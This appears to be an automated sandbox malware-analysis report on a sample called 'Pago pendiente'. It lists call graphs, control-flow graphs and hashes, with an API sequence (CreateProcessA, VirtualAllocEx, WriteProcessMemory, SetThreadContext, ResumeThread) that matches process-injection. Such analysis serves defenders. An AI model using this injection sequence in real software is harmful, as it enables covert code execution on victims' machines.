31a71bc 3 API calls 44665->44666 44667 31a77c5 44666->44667 44667->44663 44668 7a5a150 44669 7a5a2db 44668->44669 44671 7a5a176 44668->44671 44671->44669 44672 7a56648 44671->44672 44673 7a5a3d0 PostMessageW 44672->44673 44674 7a5a43c 44673->44674 44674->44671 44682 58b7172 44683 58b6fd0 44682->44683 44684 58b7d3b 44683->44684 44685 58b6bbc 3 API calls 44683->44685 44686 58b7c9e 44683->44686 44687 31a8689 3 API calls 44684->44687 44688 31a71bc 3 API calls 44684->44688 44685->44683 44687->44686 44688->44686 44356 31ad3a0 44357 31ad3e6 44356->44357 44361 31ad978 44357->44361 44364 31ad988 44357->44364 44358 31ad4d3 44367 31ad5dc 44361->44367 44365 31ad9b6 44364->44365 44366 31ad5dc DuplicateHandle 44364->44366 44365->44358 44366->44365 44368 31ad9f0 DuplicateHandle 44367->44368 44369 31ad9b6 44368->44369 44369->44358 44370 18fd1b4 44371 18fd1cc 44370->44371 44372 18fd226 44371->44372 44377 58b1f79 44371->44377 44382 58b2cf8 44371->44382 44387 58b2ce8 44371->44387 44392 58b1f88 44371->44392 44378 58b1fae 44377->44378 44380 58b2ce8 3 API calls 44378->44380 44381 58b2cf8 3 API calls 44378->44381 44379 58b1fcf 44379->44372 44380->44379 44381->44379 44383 58b2d25 44382->44383 44384 58b2d57 44383->44384 44397 58b2e80 44383->44397 44401 58b2e70 44383->44401 44388 58b2cf2 44387->44388 44389 58b2d57 44388->44389 44390 58b2e80 3 API calls 44388->44390 44391 58b2e70 3 API calls 44388->44391 44390->44389 44391->44389 44393 58b1fae 44392->44393 44395 58b2ce8 3 API calls 44393->44395 44396 58b2cf8 3 API calls 44393->44396 44394 58b1fcf 44394->44372 44395->44394 44396->44394 44399 58b2e94 44397->44399 44398 58b2f20 44398->44384 44405 58b2f38 44399->44405 44403 58b2e80 44401->44403 44402 58b2f20 44402->44384 44404 58b2f38 3 API calls 44403->44404 44404->44402 44406 58b2f49 44405->44406 44408 58b44f1 44405->44408 44406->44398 44409 58b44fa 44408->44409 44410 58b4511 44408->44410 44414 58b44f1 2 API calls 44409->44414 44417 58b4520 44409->44417 44421 58b4510 44409->44421 44412 58b45ba CallWindowProcW 44410->44412 44413 58b4569 44410->44413 44411 58b450a 44411->44406 44412->44413 44413->44406 44414->44411 44418 58b4562 44417->44418 44420 58b4569 44417->44420 44419 58b45ba CallWindowProcW 44418->44419 44418->44420 44419->44420 44420->44411 44422 58b4520 44421->44422 44423 58b45ba CallWindowProcW 44422->44423 44424 58b4569 44422->44424 44423->44424 44424->44411 44439 7a58179 44444 7a58f8e 44439->44444 44461 7a58f18 44439->44461 44477 7a58f28 44439->44477 44440 7a58188 44445 7a58f1c 44444->44445 44447 7a58f91 44444->44447 44446 7a58f4a 44445->44446 44493 7a593c5 44445->44493 44498 7a5945a 44445->44498 44503 7a59a9b 44445->44503 44508 7a59598 44445->44508 44513 7a5941e 44445->44513 44518 7a5943f 44445->44518 44523 7a59694 44445->44523 44529 7a59794 44445->44529 44533 7a59634 44445->44533 44540 7a59be2 44445->44540 44544 7a59520 44445->44544 44549 7a597e6 44445->44549 44554 7a594a7 44445->44554 44446->44440 44447->44440 44462 7a58f1c 44461->44462 44463 7a593c5 2 API calls 44462->44463 44464 7a594a7 2 API calls 44462->44464 44465 7a597e6 2 API calls 44462->44465 44466 7a59520 2 API calls 44462->44466 44467 7a59be2 2 API calls 44462->44467 44468 7a59634 4 API calls 44462->44468 44469 7a59794 2 API calls 44462->44469 44470 7a59694 2 API calls 44462->44470 44471 7a5943f 2 API calls 44462->44471 44472 7a5941e 2 API calls 44462->44472 44473 7a58f4a 44462->44473 44474 7a59598 2 API calls 44462->44474 44475 7a59a9b 2 API calls 44462->44475 44476 7a5945a 2 API calls 44462->44476 44463->44473 44464->44473 44465->44473 44466->44473 44467->44473 44468->44473 44469->44473 44470->44473 44471->44473 44472->44473 44473->44440 44474->44473 44475->44473 44476->44473 44478 7a58f42 44477->44478 44479 7a593c5 2 API calls 44478->44479 44480 7a594a7 2 API calls 44478->44480 44481 7a597e6 2 API calls 44478->44481 44482 7a59520 2 API calls 44478->44482 44483 7a58f4a 44478->44483 44484 7a59be2 2 API calls 44478->44484 44485 7a59634 4 API calls 44478->44485 44486 7a59794 2 API calls 44478->44486 44487 7a59694 2 API calls 44478->44487 44488 7a5943f 2 API calls 44478->44488 44489 7a5941e 2 API calls 44478->44489 44490 7a59598 2 API calls 44478->44490 44491 7a59a9b 2 API calls 44478->44491 44492 7a5945a 2 API calls 44478->44492 44479->44483 44480->44483 44481->44483 44482->44483 44483->44440 44484->44483 44485->44483 44486->44483 44487->44483 44488->44483 44489->44483 44490->44483 44491->44483 44492->44483 44494 7a593cb 44493->44494 44559 7a57bd4 44494->44559 44564 7a57be0 44494->44564 44499 7a5946c 44498->44499 44568 7a5a028 44499->44568 44573 7a5a038 44499->44573 44500 7a5987f 44504 7a59ab0 44503->44504 44586 7a57951 44504->44586 44590 7a57958 44504->44590 44505 7a59b1d 44509 7a59427 44508->44509 44509->44508 44511 7a57951 WriteProcessMemory 44509->44511 44512 7a57958 WriteProcessMemory 44509->44512 44510 7a59a67 44511->44510 44512->44510 44514 7a59427 44513->44514 44516 7a57951 WriteProcessMemory 44514->44516 44517 7a57958 WriteProcessMemory 44514->44517 44515 7a59a67 44516->44515 44517->44515 44519 7a59445 44518->44519 44594 7a57710 44519->44594 44598 7a5770b 44519->44598 44520 7a594da 44520->44446 44525 7a594c5 44523->44525 44524 7a59bb7 44524->44446 44525->44524 44527 7a57710 ResumeThread 44525->44527 44528 7a5770b ResumeThread 44525->44528 44526 7a594da 44526->44446 44527->44526 44528->44526 44602 7a577c0 44529->44602 44606 7a577bb 44529->44606 44530 7a597ae 44536 7a577c0 Wow64SetThreadContext 44533->44536 44537 7a577bb Wow64SetThreadContext 44533->44537 44534 7a59456 44535 7a594da 44534->44535 44538 7a57710 ResumeThread 44534->44538 44539 7a5770b ResumeThread 44534->44539 44535->44446 44536->44534 44537->44534 44538->44535 44539->44535 44610 7a57a40 44540->44610 44614 7a57a48 44540->44614 44541 7a59c04 44545 7a59427 44544->44545 44547 7a57951 WriteProcessMemory 44545->44547 44548 7a57958 WriteProcessMemory 44545->44548 44546 7a59a67 44547->44546 44548->44546 44550 7a59809 44549->44550 44552 7a57951 WriteProcessMemory 44550->44552 44553 7a57958 WriteProcessMemory 44550->44553 44551 7a59ca2 44552->44551 44553->44551 44555 7a594ad 44554->44555 44557 7a57710 ResumeThread 44555->44557 44558 7a5770b ResumeThread 44555->44558 44556 7a594da 44556->44446 44557->44556 44558->44556 44560 7a57b82 44559->44560 44561 7a57bda CreateProcessA 44559->44561 44560->44446 44563 7a57e2b 44561->44563 44565 7a57c69 CreateProcessA 44564->44565 44567 7a57e2b 44565->44567 44569 7a5a04d 44568->44569 44578 7a57893 44569->44578 44582 7a57898 44569->44582 44570 7a5a06c 44570->44500 44574 7a5a04d 44573->44574 44576 7a57893 VirtualAllocEx 44574->44576 44577 7a57898 VirtualAllocEx 44574->44577 44575 7a5a06c 44575->44500 44576->44575 44577->44575 44579 7a57898 VirtualAllocEx 44578->44579 44581 7a57915 44579->44581 44581->44570 44583 7a578d8 VirtualAllocEx 44582->44583 44585 7a57915 44583->44585 44585->44570 44587 7a57958 WriteProcessMemory 44586->44587 44589 7a579f7 44587->44589 44589->44505 44591 7a579a0 WriteProcessMemory 44590->44591 44593 7a579f7 44591->44593 44593->44505 44595 7a57750 ResumeThread 44594->44595 44597 7a57781 44595->44597 44597->44520 44599 7a57710 ResumeThread 44598->44599 44601 7a57781 44599->44601 44601->44520 44603 7a57805 Wow64SetThreadContext 44602->44603 44605 7a5784d 44603->44605 44605->44530 44607 7a577c0 Wow64SetThreadContext 44606->44607 44609 7a5784d 44607->44609 44609->44530 44611 7a57a93 ReadProcessMemory 44610->44611 44613 7a57ad7 44611->44613 44613->44541 44615 7a57a93 ReadProcessMemory 44614->44615 44617 7a57ad7 44615->44617 44617->44541

                                                          Executed Functions

                                                          Function 07724560 Relevance: 4.1, Strings: 3, Instructions: 304COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1165 7724560-7724562 1166 7724564-7724566 1165->1166 1167 772456b-772456e 1165->1167 1168 7724568-772456a 1166->1168 1169 772456f-7724570 1166->1169 1167->1169 1170 7724577-772457a 1167->1170 1168->1167 1171 7724573-7724575 1168->1171 1172 7724572 1169->1172 1173 77245b1-77245b2 1169->1173 1174 7724583-7724584 1170->1174 1175 772457b-772457e 1170->1175 1171->1170 1172->1171 1172->1175 1176 77245b3-77245b6 1173->1176 1177 77245bb-77245be 1173->1177 1179 7724587-772458c 1174->1179 1178 7724580 1175->1178 1175->1179 1182 77245b8 1176->1182 1183 77245bf-77245c2 1176->1183 1177->1183 1184 77245c7-77245ca 1177->1184 1178->1174 1180 77245d2 1179->1180 1181 772458e 1179->1181 1185 77245d3-77245d4 1180->1185 1189 77245db-77245e0 1180->1189 1187 7724590-7724596 1181->1187 1188 7724597-772459d 1181->1188 1182->1177 1186 77245cb-77245cd 1183->1186 1190 77245c4-77245c5 1183->1190 1184->1185 1184->1186 1192 77245d7-77245da 1185->1192 1191 77245d0 1186->1191 1186->1192 1187->1188 1193 772459f-77245a2 1187->1193 1188->1193 1194 77245e3-77245e4 1189->1194 1190->1184 1191->1180 1192->1189 1192->1194 1195 77245a4 1193->1195 1196 77245ab-77245ac 1193->1196 1197 77245e5-77245e6 1194->1197 1195->1194 1198 77245a6 1195->1198 1199 77245af-77245b0 1196->1199 1200 77245e7-77245ea 1197->1200 1201 77245ef-77245f2 1197->1201 1198->1199 1202 77245a8-77245aa 1198->1202 1199->1173 1203 77245f3-77245f5 1200->1203 1204 77245ec-77245ee 1200->1204 1201->1203 1205 77245fb-772461b 1201->1205 1202->1176 1202->1196 1203->1197 1206 77245f7 1203->1206 1204->1201 1207 7724622-7724698 1205->1207 1208 772461d 1205->1208 1206->1205 1213 772469b 1207->1213 1208->1207 1214 77246a2-77246be 1213->1214 1215 77246c0 1214->1215 1216 77246c7-77246c8 1214->1216 1215->1213 1217 7724816-7724886 1215->1217 1218 77246e4-7724723 1215->1218 1219 77247fa-7724811 1215->1219 1220 7724728-772472c 1215->1220 1221 7724758-772476a 1215->1221 1222 77247d9-77247f5 1215->1222 1223 772479e-77247d4 1215->1223 1224 772476f-7724799 1215->1224 1225 77246cd-77246e2 1215->1225 1216->1217 1216->1225 1239 7724888 call 7726526 1217->1239 1240 7724888 call 7726436 1217->1240 1241 7724888 call 7725ee4 1217->1241 1242 7724888 call 77258e8 1217->1242 1243 7724888 call 77258d8 1217->1243 1244 7724888 call 7725e6c 1217->1244 1218->1214 1219->1214 1226 772472e-772473d 1220->1226 1227 772473f-7724746 1220->1227 1221->1214 1222->1214 1223->1214 1224->1214 1225->1214 1229 772474d-7724753 1226->1229 1227->1229 1229->1214 1238 772488e-7724898 1239->1238 1240->1238 1241->1238 1242->1238 1243->1238 1244->1238
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teeq$Teeq$)"
                                                          • API String ID: 0-1356520842
                                                          • Opcode ID: 7cd46f6e012907abde5ab010c375d348fe7d695a29192f18a59667f0edcf9304
                                                          • Instruction ID: ebf7644fc9d0af94021043ab6c9f0436568c94a446ec9ca5e79f20ac60faf316
                                                          • Opcode Fuzzy Hash: 7cd46f6e012907abde5ab010c375d348fe7d695a29192f18a59667f0edcf9304
                                                          • Instruction Fuzzy Hash: 01B1AFB5E106998FCB04CFAAD8405DEFBB6FF89350F20802AD465AB215D7309D42CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 077245F8 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1312 77245f8-772461b 1314 7724622-7724698 1312->1314 1315 772461d 1312->1315 1320 772469b 1314->1320 1315->1314 1321 77246a2-77246be 1320->1321 1322 77246c0 1321->1322 1323 77246c7-77246c8 1321->1323 1322->1320 1324 7724816-7724886 1322->1324 1325 77246e4-7724723 1322->1325 1326 77247fa-7724811 1322->1326 1327 7724728-772472c 1322->1327 1328 7724758-772476a 1322->1328 1329 77247d9-77247f5 1322->1329 1330 772479e-77247d4 1322->1330 1331 772476f-7724799 1322->1331 1332 77246cd-77246e2 1322->1332 1323->1324 1323->1332 1346 7724888 call 7726526 1324->1346 1347 7724888 call 7726436 1324->1347 1348 7724888 call 7725ee4 1324->1348 1349 7724888 call 77258e8 1324->1349 1350 7724888 call 77258d8 1324->1350 1351 7724888 call 7725e6c 1324->1351 1325->1321 1326->1321 1333 772472e-772473d 1327->1333 1334 772473f-7724746 1327->1334 1328->1321 1329->1321 1330->1321 1331->1321 1332->1321 1336 772474d-7724753 1333->1336 1334->1336 1336->1321 1345 772488e-7724898 1346->1345 1347->1345 1348->1345 1349->1345 1350->1345 1351->1345
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teeq$Teeq$)"
                                                          • API String ID: 0-1356520842
                                                          • Opcode ID: 3eb517b6f5b04f5edaadd09e81b416579a44791f2fa1be9faaacab3e199a5796
                                                          • Instruction ID: 72c811d0ab9c78a98467e5a2571360004e631099f762363f73f32264c28b7a06
                                                          • Opcode Fuzzy Hash: 3eb517b6f5b04f5edaadd09e81b416579a44791f2fa1be9faaacab3e199a5796
                                                          • Instruction Fuzzy Hash: 1081E3B4E106598FCB08CFAAC984AEEFBB2FF89300F24902AD515AB354D7345906CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772663F Relevance: 1.7, Strings: 1, Instructions: 444COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tIh
                                                          • API String ID: 0-443931868
                                                          • Opcode ID: 98463883a82560923b9569f130ce7f508f667b6eef9169959a9be050a1d6756e
                                                          • Instruction ID: 8b4bf46f335bc6eb1d5e602d9d9ff8949550777c03439740f8004e1b76d75a61
                                                          • Opcode Fuzzy Hash: 98463883a82560923b9569f130ce7f508f667b6eef9169959a9be050a1d6756e
                                                          • Instruction Fuzzy Hash: EB025AB1914226CFCB04DFA5E4848AEFBB6FB45390F14856BD421EB612CB349983DF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07726717 Relevance: 1.6, Strings: 1, Instructions: 336COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tIh
                                                          • API String ID: 0-443931868
                                                          • Opcode ID: a2dcdde2e4d02ae9417504fa49872ffac7c5eb55ad2130c89fbfa6162c38179b
                                                          • Instruction ID: b46c7f09edd7109a50560591f16f9a748b6b59f53d043f7a98aeed5a7ebaac60
                                                          • Opcode Fuzzy Hash: a2dcdde2e4d02ae9417504fa49872ffac7c5eb55ad2130c89fbfa6162c38179b
                                                          • Instruction Fuzzy Hash: 5FE15AB0D14216CFCB04DF95D4808AEFBB2FF89380B10D56AD422EB615DB34AA42DF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07726798 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tIh
                                                          • API String ID: 0-443931868
                                                          • Opcode ID: 4008d94df9e03abc82eebb962298d7ab43b03fd626e6dd741837be65e3449692
                                                          • Instruction ID: 56d8178d578e96fe18b37f132d25a0dc96449f0a49df95407e36f35ba89122d7
                                                          • Opcode Fuzzy Hash: 4008d94df9e03abc82eebb962298d7ab43b03fd626e6dd741837be65e3449692
                                                          • Instruction Fuzzy Hash: 5FD138B0D1521ADFCB04DF99C5848AEFBB2FF89340F10D56AD421AB215DB34AA42DF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A5B630 Relevance: .6, Instructions: 612COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a432508f3432161d182f7aff88fb53c590656d9dabb6d9e681d51984c1fb0be1
                                                          • Instruction ID: 7e30d05f231b8eaaf6e4d5702637bbfb37221f6f68f6eaee46dbb1b05e2c9717
                                                          • Opcode Fuzzy Hash: a432508f3432161d182f7aff88fb53c590656d9dabb6d9e681d51984c1fb0be1
                                                          • Instruction Fuzzy Hash: 5D32BBF4B016058FDB15DB69C550BAEBBF6AF88302F204469E916DB7A0CB35ED01CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07729840 Relevance: .2, Instructions: 231COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e11faabf25279f8a06d9a9385b95c283fc60d1431e46dd60c1a09656c19960d2
                                                          • Instruction ID: 9d26b86af983dbfca5bda0cc06527a8bd41ea0e279f2f7b2b55e28a5da6d6130
                                                          • Opcode Fuzzy Hash: e11faabf25279f8a06d9a9385b95c283fc60d1431e46dd60c1a09656c19960d2
                                                          • Instruction Fuzzy Hash: 9F915DB0D15218DFCB48CF99D5809ADFBB6FF8A350F24A419E126BB224D730A946DF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07729831 Relevance: .2, Instructions: 225COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8dfaaaa0a60b7b54cd79956d8af3119daa53b8e0439e3527577adea0f8486331
                                                          • Instruction ID: 50155aa0099a996ff7678cdb5ab08b57c0dd1d774ca1dbc83accdf94980c2d7b
                                                          • Opcode Fuzzy Hash: 8dfaaaa0a60b7b54cd79956d8af3119daa53b8e0439e3527577adea0f8486331
                                                          • Instruction Fuzzy Hash: EF916DB0D15219DFCB48CFA9D5809ADFBB6FF8A350F24A426E125B7224D734A902CF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07729518 Relevance: .2, Instructions: 209COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3aeeae9c052f3045e53b0218eaadaa85c31bfaf2d05bebeb2c3b56cf3868934e
                                                          • Instruction ID: 4c719cf4e025f57f77cb10b23d604966c1c24038650ece89fb050e0fc815e37e
                                                          • Opcode Fuzzy Hash: 3aeeae9c052f3045e53b0218eaadaa85c31bfaf2d05bebeb2c3b56cf3868934e
                                                          • Instruction Fuzzy Hash: 308124B4E14229DFCB04CFAAC8409EEFBB1FB89340F14985AD925B7254D738A952CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07729528 Relevance: .2, Instructions: 204COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6adf22388ea5a1021c37e6b5c0794d87bf75ed6c715c4f3b1641c1e05cf4fa94
                                                          • Instruction ID: eb64dcedc6c2cae228e4c5f6b22798c220076fe5afb71d51b1db3518b40e6ed4
                                                          • Opcode Fuzzy Hash: 6adf22388ea5a1021c37e6b5c0794d87bf75ed6c715c4f3b1641c1e05cf4fa94
                                                          • Instruction Fuzzy Hash: 218121B4E10229CFCB04CFAAC8809EEFBB1FB89340F14955AD925B7254D734A952CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A51E88 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08a24afe5fb2c644d99543e8352666d2b4ef9a753e698379cdb7b800e44d0501
                                                          • Instruction ID: c16fc6c45e9809a79527ec1b58353736bb26c2515e480245b5f34675fa066ffb
                                                          • Opcode Fuzzy Hash: 08a24afe5fb2c644d99543e8352666d2b4ef9a753e698379cdb7b800e44d0501
                                                          • Instruction Fuzzy Hash: 5A2128B1D146188BEB18CF97C9453EEBFB6BFC9300F04C06AD818B62A5DB7409458F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 077258E8 Relevance: .1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 093366c138605c319b6b48f6e9124b41725b112bad2967ba5a18267e115d356a
                                                          • Instruction ID: 4cc830e7ac552545ad569fb2bf08ec128583e29a4d210fcdcc6d84d38252364a
                                                          • Opcode Fuzzy Hash: 093366c138605c319b6b48f6e9124b41725b112bad2967ba5a18267e115d356a
                                                          • Instruction Fuzzy Hash: E221E9B1E016188BDB18CF9BD8452DEFBF7AFC9310F14C17AD418A6258DB741A568E90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 077258D8 Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3e7ffbab997a5cfc233e0e34093723da65d6ae2094e40b876273a1ebc4094a78
                                                          • Instruction ID: 1a14f45286c1c347711ea59660b75f71ec6f92b3711481917a75b564b6302007
                                                          • Opcode Fuzzy Hash: 3e7ffbab997a5cfc233e0e34093723da65d6ae2094e40b876273a1ebc4094a78
                                                          • Instruction Fuzzy Hash: C52121B1E016598BDB18CFABC9452DEBBF3AFC9310F14C07AD408AA258DB744946CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A51E98 Relevance: .1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 58ef445a4f85c82be1f7959884dac81c15e8eb2efbd8f5775fbeef55312de053
                                                          • Instruction ID: fc83550a6ac868d8330583a50a4a042cf14e2f90bb96d06e90f6c6bb443d52b1
                                                          • Opcode Fuzzy Hash: 58ef445a4f85c82be1f7959884dac81c15e8eb2efbd8f5775fbeef55312de053
                                                          • Instruction Fuzzy Hash: 7221C3B0D146188BEB18CF9BD9457EEFAF6BFC9300F04C06AE819762A4DB7409458F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07721E46 Relevance: 16.5, Strings: 13, Instructions: 292COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 305 7721e46-7721e4e 306 7721e55-7721e62 305->306 307 7721e4f-7721e53 305->307 308 7721e64 306->308 307->308 310 7721e69-7721e73 308->310 311 7721e7e-7721e92 call 77230d8 310->311 312 7721e98 311->312 313 7721e9b-7721ea5 312->313 314 7722185-772219d 313->314 315 7721eab-7721eb7 313->315 316 7721dcd-7721dd0 315->316 318 7721de2-7721de6 316->318 319 7721dd2 316->319 330 7721de8-7721df1 318->330 331 7721e09 318->331 319->313 319->318 320 7722092-7722097 319->320 321 7722162-7722176 319->321 322 7721f60-7721f64 319->322 323 7722114-772213e 319->323 324 772204b-7722053 319->324 325 7722058-772206b 319->325 326 7722179-7722182 319->326 327 7721faf-7721fc2 319->327 328 772209c-77220b2 319->328 329 7721ebc-7721ec0 319->329 320->316 332 7721f66-7721f6f 322->332 333 7721f87 322->333 393 7722140 323->393 394 772214a-7722154 323->394 324->316 354 772208b-7722090 325->354 355 772206d-7722074 325->355 327->314 358 7721fc8-7721fd0 327->358 359 77220b4-77220c6 328->359 360 77220c8 328->360 335 7721ec2-7721ecb 329->335 336 7721ee3 329->336 337 7721df3-7721df6 330->337 338 7721df8-7721e05 330->338 334 7721e0c-7721e0e 331->334 340 7721f71-7721f74 332->340 341 7721f76-7721f83 332->341 346 7721f8a-7721faa 333->346 343 7721e10-7721e16 334->343 344 7721e26-7721e43 334->344 349 7721ed2-7721edf 335->349 350 7721ecd-7721ed0 335->350 345 7721ee6-7721eea 336->345 351 7721e07 337->351 338->351 353 7721f85 340->353 341->353 361 7721e1a-7721e24 343->361 362 7721e18 343->362 382 7721e66-7721e68 344->382 383 7721e45 344->383 363 7721f00 345->363 364 7721eec-7721efe 345->364 346->316 356 7721ee1 349->356 350->356 351->334 353->346 369 7722086 354->369 355->314 368 772207a-7722081 355->368 356->345 371 7721fd2-7721fdb 358->371 372 7721ff3 358->372 373 77220cb-77220d8 359->373 360->373 361->344 362->344 374 7721f03-7721f07 363->374 364->374 368->369 369->316 376 7721fe2-7721fef 371->376 377 7721fdd-7721fe0 371->377 378 7721ff6-7721ff8 372->378 398 77220f0-77220fd 373->398 399 77220da-77220e0 373->399 379 7721f28 374->379 380 7721f09-7721f12 374->380 385 7721ff1 376->385 377->385 386 7722016 378->386 387 7721ffa-7722000 378->387 391 7721f2b-7721f4c 379->391 389 7721f14-7721f17 380->389 390 7721f19-7721f1c 380->390 382->310 383->305 385->378 392 7722018-772201a 386->392 396 7722002-7722004 387->396 397 7722006-7722012 387->397 400 7721f26 389->400 390->400 391->314 410 7721f52-7721f5b 391->410 402 7722034-7722046 392->402 403 772201c-7722022 392->403 404 7722145 393->404 394->314 405 7722156-7722160 394->405 406 7722014 396->406 397->406 398->314 409 7722103-772210f 398->409 407 77220e2 399->407 408 77220e4-77220e6 399->408 400->391 402->316 411 7722026-7722032 403->411 412 7722024 403->412 404->316 405->404 406->392 407->398 408->398 409->316 410->316 411->402 412->402
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
